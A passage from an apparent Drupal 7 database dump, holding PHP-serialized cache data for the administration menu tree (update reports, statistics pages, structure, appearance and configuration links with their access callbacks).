configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:4:{i:266;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"266\";s:4:\"plid\";s:3:\"260\";s:9:\"link_path\";s:29:\"admin/reports/updates/install\";s:11:\"router_path\";s:29:\"admin/reports/updates/install\";s:10:\"link_title\";s:27:\"Install new module or theme\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"25\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"260\";s:2:\"p4\";s:3:\"266\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:62:\"a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:6:\"report\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:27:\"Install new module or theme\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:267;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"267\";s:4:\"plid\";s:3:\"260\";s:9:\"link_path\";s:28:\"admin/reports/updates/update\";s:11:\"router_path\";s:28:\"admin/reports/updates/update\";s:10:\"link_title\";s:6:\"Update\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"260\";s:2:\"p4\";s:3:\"267\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:61:\"a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:6:\"report\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:6:\"Update\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:0:{}}i:268;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"268\";s:4:\"plid\";s:3:\"260\";s:9:\"link_path\";s:26:\"admin/reports/updates/list\";s:11:\"router_path\";s:26:\"admin/reports/updates/list\";s:10:\"link_title\";s:4:\"List\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"260\";s:2:\"p4\";s:3:\"268\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:4:\"List\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:269;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"269\";s:4:\"plid\";s:3:\"260\";s:9:\"link_path\";s:30:\"admin/reports/updates/settings\";s:11:\"router_path\";s:30:\"admin/reports/updates/settings\";s:10:\"link_title\";s:8:\"Settings\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"50\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"260\";s:2:\"p4\";s:3:\"269\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:33:\"a:1:{i:0;s:15:\"update_settings\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:8:\"Settings\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:352;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"352\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:18:\"admin/reports/hits\";s:11:\"router_path\";s:18:\"admin/reports/hits\";s:10:\"link_title\";s:11:\"Recent hits\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"352\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:353;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"353\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/pages\";s:11:\"router_path\";s:19:\"admin/reports/pages\";s:10:\"link_title\";s:9:\"Top pages\";s:7:\"options\";s:91:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"353\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:20:\"statistics_top_pages\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/pages\";s:5:\"title\";s:9:\"Top pages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:41:\"View pages that have been hit frequently.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:354;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"354\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:23:\"admin/reports/referrers\";s:11:\"router_path\";s:23:\"admin/reports/referrers\";s:10:\"link_title\";s:13:\"Top referrers\";s:7:\"options\";s:69:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"354\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:24:\"statistics_top_referrers\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/reports/referrers\";s:5:\"title\";s:13:\"Top referrers\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:19:\"View top referrers.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:355;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"355\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/visitors\";s:11:\"router_path\";s:22:\"admin/reports/visitors\";s:10:\"link_title\";s:12:\"Top visitors\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"355\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many pages.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:358;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"358\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/access/%\";s:11:\"router_path\";s:22:\"admin/reports/access/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:66:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"358\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:21:\"statistics_access_log\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/access/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:16:\"View access log.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1426848142,1),('links:management:tree-data:en:91b77ffcd906388455005818ae5d1f5942cd3182ebca1663104f27b019389442','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:10:{i:35;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"35\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:20:\"admin/config/content\";s:11:\"router_path\";s:20:\"admin/config/content\";s:10:\"link_title\";s:17:\"Content authoring\";s:7:\"options\";s:103:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:53:\"Settings related to formatting and authoring content.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"35\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/config/content\";s:5:\"title\";s:17:\"Content 